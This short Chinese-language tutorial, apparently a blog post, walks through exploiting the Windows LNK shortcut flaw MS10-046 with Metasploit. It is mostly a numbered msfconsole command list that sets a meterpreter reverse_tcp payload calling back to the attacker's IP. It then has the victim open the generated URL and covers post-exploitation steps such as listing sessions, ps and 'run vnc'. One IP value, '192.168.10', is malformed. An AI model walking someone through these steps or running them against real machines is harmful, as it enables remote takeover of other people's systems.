这次用到MS10-046这个远程执行漏洞(Windows快捷方式LNK文件自动执行代码漏洞攻击)
命令:
1. msfconsole //启动MSF Metasploit
2. search ms10-046 //搜索漏洞
3. use windows/browser/ms10_046_shortcut_icon_dllloader //加载漏洞模块
4. set payload windows/meterpreter/reverse_tcp //设置一个PAYLOAD为反弹连接shell
5. show options //查看相关设置
6. set SRVHOST 192.168.1.10 //设置攻击者自身IP
7. set LHOST 192.168.10 //设置反弹连接回来的IP (攻击者自身IP)
8. exploit //开始执行漏洞...
会生成一个URL连接 复制这个地址 去另一台XP系统机器上测试 用浏览器打开会跳到共享文件夹下
然后我们在来到MSF终端看见漏洞执行成功了 有一个连接会话 ID 1
命令 :
sessions -l 查看存在的会话
sessions -i 1 选着会话1
输入ps命令查看进程 或者 输入run vnc 查看远程桌面 等等